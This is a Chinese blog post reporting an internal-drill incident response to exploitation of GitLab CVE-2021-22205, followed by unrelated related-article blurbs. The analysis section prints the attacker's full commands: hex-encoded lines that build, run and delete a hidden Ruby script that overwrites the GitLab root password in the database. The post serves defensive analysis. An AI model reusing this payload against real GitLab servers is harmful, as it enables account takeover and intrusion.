记一次gitlab应急响应

news2024/11/15 23:55:33

为方便您的阅读,可点击下方蓝色字体,进行跳转↓↓↓

    • 01 事件背景介绍
    • 02 事件分析过程
    • 03 事件分析结果
    • 04 安全加固建议

01 事件背景介绍


某内部应急演练中,态势感知平台上出现gitlab RCE漏洞攻击成功告警,现需根据流量情况进行安全事件分析。


02 事件分析过程

根据态势感知平台,确认发起攻击的IP地址,以该地址为源地址进行搜索,寻找攻击痕迹及路径。通过流量分析,判断攻击者首先尝试使用弱口令登陆gitlab,从响应状态判断弱口令没有登陆成功。

在这里插入图片描述

在后续的流量发现存在422响应包,进一步分析攻击者使用gitlab RCE漏洞(CVE-2021-22205)对80.X.X.60成功发起攻击:

在这里插入图片描述

攻击者写入恶意脚本/tmp/.JARRLTW.rb,并执行,成功执行后删除脚本

echo -n 72657175697265202779616d6c270a7265717569726520277067270a636f6e666967203d2059414d4c3a3a6c6f61645f6669 >> /tmp/.JARRLTW.rb
echo -n 6c6528272f7661722f6f70742f6769746c61622f6769746c61622d7261696c732f6574632f64617461626173652e796d6c27 >> /tmp/.JARRLTW.rb
echo -n 295b2770726f64756374696f6e275d0a636f6e6e203d2050472e636f6e6e65637428636f6e6669675b27686f7374275d2c20 >> /tmp/.JARRLTW.rb
echo -n 636f6e6669675b27706f7274275d2c2027272c2027272c20636f6e6669675b276461746162617365275d2c20636f6e666967 >> /tmp/.JARRLTW.rb
echo -n 5b27757365726e616d65275d2c20636f6e6669675b2770617373776f7264275d290a636f6e6e2e6578656328277570646174 >> /tmp/.JARRLTW.rb
echo -n 652075736572732073657420636f6e6669726d6174696f6e5f746f6b656e3d2873656c65637420656e637279707465645f70 >> /tmp/.JARRLTW.rb
echo -n 617373776f72642066726f6d20757365727320776865726520757365726e616d653d5c27726f6f745c27292c656e63727970 >> /tmp/.JARRLTW.rb
echo -n 7465645f70617373776f72643d5c272432612431302436386857326461516b544678614c5478663538427a75744c54414263 >> /tmp/.JARRLTW.rb
echo -n 456264506e633058324451522f4d6946306658744157344f475c272c73746174653d5c276163746976655c27207768657265 >> /tmp/.JARRLTW.rb
echo -n 20757365726e616d653d5c27726f6f745c273b2729 >> /tmp/.JARRLTW.rb
cat /tmp/.JARRLTW.rb | xxd -r -p | tee /tmp/.JARRLTW.rb
/opt/gitlab/embedded/bin/ruby /tmp/.JARRLTW.rb
/usr/bin/rm -rf /tmp/.JARRLTW.rb

还原脚本,具体代码如下图所示

在这里插入图片描述

该脚本更改了gitlab root用户的密码,从302状态码看,攻击者成功利用修改后的密码登陆了gitlab。

在这里插入图片描述
流量记录显示,攻击者存在翻阅源码行为:

在这里插入图片描述
攻击者找到仓库中ruoyi的配置文件,了解到ruoyi登录认证信息;

在这里插入图片描述
在这里插入图片描述

攻击者登录rouyi并添加定时任务:请求并执行恶意jar包

在这里插入图片描述
在这里插入图片描述

通过微步情报在线,进一步确认IP为攻击者IP

在这里插入图片描述



03 事件分析结果


攻击者10.X.X.2利用gitlab RCE漏洞(CVE-2021-22205)写入恶意脚本,修改GitLab root密码,登录后在仓库中翻阅源码找到rouyi配置文件从而成功登录位于50.X.X.40的rouyi并设置定时任务获取远程恶意类命令执行。

04 安全加固建议


1、在安全设备上,如防火墙、IDS上封禁攻击IP:10.X.X.2。

2、 针对本次失陷主机50.X.X.40,进行网络隔离,排查入侵痕迹和内网横向情况,修复gitlab RCE漏洞。

3、重新修改rouyi配置文件,确保配置信息符合安全要求。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/658403.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

013、数据库管理之连接管理

连接管理 TiDB的连接特性连接TiDB 数据库开发接口支持 实验案例 TiDB的连接特性 无状态MySQL协议支持 100% 兼容MySQL 5.7协议支持MySQL 5.7常用功能与语法 MySQL 语法支持的限制(不支持的功能特性) 存储过程触发器外键函数其它 连接TiDB 数据库 使…

记一次shiro应急响应

为方便您的阅读,可点击下方蓝色字体,进行跳转↓↓↓ 01 事件背景介绍02 事件分析过程03 事件分析结果04 安全加固建议 01 事件背景介绍 某内部应急演练中,安全部门监测到WAF上存在shiro攻击成功告警信息,现需根据流量情况进行安全…

Vue中的表单上传与文件预览

Vue中的表单上传与文件预览 在Web应用程序中,文件上传和预览是非常常见的功能。在Vue中,我们可以使用axios和FormData来实现表单上传,使用FileReader来实现文件预览。在本文中,我们将介绍如何在Vue中实现表单上传和文件预览功能。…

[阿里云使用k8s技术部署微服务]

1.1 检查CPU/内存/网络设置 对虚拟机的要求(必须): CPU:最少2核 内存:master >4G,node >3G 网络:NAT模式 操作系统版本: Docker 要求 CentOS 系统的内核版本必须高于 3.10。 如果内核版本为3.10,则发行编号最好能升级到1127, 即:3.10.0…

1000*B. Keep it Beautiful

input 3 9 3 7 7 9 2 4 6 3 4 5 1 1 1 1 1 5 3 2 1 2 3output 111110010 11111 11011 解析: 如果数据不小于前一个数据,则一直为美丽序列; 当碰到第一个小于末尾的数据时,1. 如果他比首数据大,则不符题意。2. 小于等…

【ARMv8 SIMD和浮点指令编程】NEON 移动指令——精通 MOV?

移动指令主要涉及 MOV 和 MVN,它们分别是移动和求反移动。如果你认为仅仅两条指令,还是太小看设计者了! 1 MOV (element) 将向量元素移动到另一个向量元素。该指令将源 SIMD&FP 寄存器的向量元素复制到目标 SIMD&FP 寄存器的指定向…

短视频seo系统源码私有化部署分享

短视频seo矩阵系统源码部署需要以下步骤: 确定系统环境要求:账号矩阵系统需要服务器环境支持PHP和MySQL数据库,因此需要确保服务器环境符合要求,并安装好相应的软件。例如,可以使用XAMPP或WAMP等软件包来快速安装PHP和…

中国唯一 一家Linux 基金会金牌会员 落户阿里云

导读2 月 20 日,全球知名非营利性组织 Linux 基金会宣布,阿里云正式成为 Linux 基金会金牌会员。阿里云表示将持续加大对开源项目的支持,并发挥自己的力量。 2 月 20 日,全球知名非营利性组织 Linux 基金会宣布,阿里云…

pyqt6安装

1、安装pyqt6和pyqt6-tools包 注意:pyqt6-tools目前仅支持python3.9版本,3.9版本后的安装部成功。(截止2022.11.20) 1.1 安装pyqt6和pyqt6-tools 安装pyqt和pyqt6-tools可以使用conda和pip进行安装 (1)…

【备战秋招】每日一题:2023.05-B卷-华为OD机试 - 报文回路

为了更好的阅读体检,可以查看我的算法学习博客报文回路 输入描述 第一行抓到的报文数量,后续C行依次输入设备节点D1和D2,表示从D1到D2发送了单向的报文,D1和D2用空格隔开 输出描述 组播通路是否“正常”,正常输出T…

SQL语言的四大组成部分——DCL(数据控制语言)

1️⃣前言 SQL语言中的DCL(Data Control Language)是一组用于控制数据库用户访问权限的语言,主要包括GRANT、REVOKE、DENY等关键字。 文章目录 1️⃣前言2️⃣DCL语言3️⃣GRANT关键字4️⃣REVOKE关键字5️⃣DENY关键字6️⃣总结附&#xff1…

从零搭建完整python自动化测试框架(UI自动化和接口自动化 )——持续更新

一、总体框架 总体框架如下图: 用例扫描、测试结果反馈,如要和其它项目管理系统或是用例管理系统对接(比如testlink),就需要单独出来进行处理。 对于大型的产品,用例数特别多的话,需要建设一个…

AIGC提示(prompt)工程之开宗明义篇

大家好,我是herosunly。985院校硕士毕业,现担任算法研究员一职,热衷于机器学习算法研究与应用。曾获得阿里云天池比赛第一名,CCF比赛第二名,科大讯飞比赛第三名。拥有多项发明专利。对机器学习和深度学习拥有自己独到的见解。曾经辅导过若干个非计算机专业的学生进入到算法…

VMware公司成为Linux基金会金牌会员

导读VMware是云基础架构和企业移动性的全球领导者,多年来一直积极参与开源开发。VMware通过Linux基金会项目(如ONAP,Cloud Native Computing Foundation(CNCF),Cloud Foundry,Open vSwitch等)稳步提高其开源参与度。它刚刚成为了金…

HDFS初认识

HDFS初认识 文章目录 HDFS初认识HDFS是什么?HDFS的假想和设计目标HDFS的优缺点优点缺点 HDFS的架构组成客户端NameNodeDataNodeSecondary NameNode职责checkpoint机制 参考 HDFS是什么? Hadoop分布式文件系统(HDFS)是一个分布式文…

Websocket+protobuf怎么与服务器通信

Websocketprotobuf怎么与服务器通信 Websocket:WebSocket是⼀种⽹络传输协议,可在单个TCP连接上进⾏双全⼯通信,位于OSI模型的 应⽤层 实现⼀个简单的客⼾端和服务端 安装websockets pip3 install websockets客户端代码 import asyncio …

记一次异常外联事件应急响应

为方便您的阅读,可点击下方蓝色字体,进行跳转↓↓↓ 01 事件背景介绍02 事件分析过程03 事件分析结果04 安全加固建议 01 事件背景介绍 某内部应急演练中,安全部门收到来自业务部门的告警,称应用服务器存在异常外联情况&#xff0…

管理类联考——英语二——技巧篇——阅读理解——taiqi

第一章 翻译技巧概述 一、词汇方面 (一)词义选择 大多数英语词汇是多义的,翻译时必须选择正确的词义。词义选择的方法有三:根据上下文和词的搭配选择根据词类选择、根据专业选择。 (二)词义转换 在理解英文词汇的原始意义基础…

算法刷题-哈希表-三数之和

用哈希表解决了两数之和,那么三数之和呢? 第15题. 三数之和 力扣题目链接 给你一个包含 n 个整数的数组 nums,判断 nums 中是否存在三个元素 a,b,c ,使得 a b c 0 ?请你找出所有满足条件且…

后台服务守护进程神器pm2介绍及使用

前言 linux的后台服务程序需要在后台一直运行。如果通过ssh访问临时启动的,会话一结束就直接关闭了服务。想让服务在后台一直运行且永远不挂掉,推荐后台服务守护进程神器pm2,强大且适用于各种语言的后台服务程序。 pm2介绍 对于后台进程的管…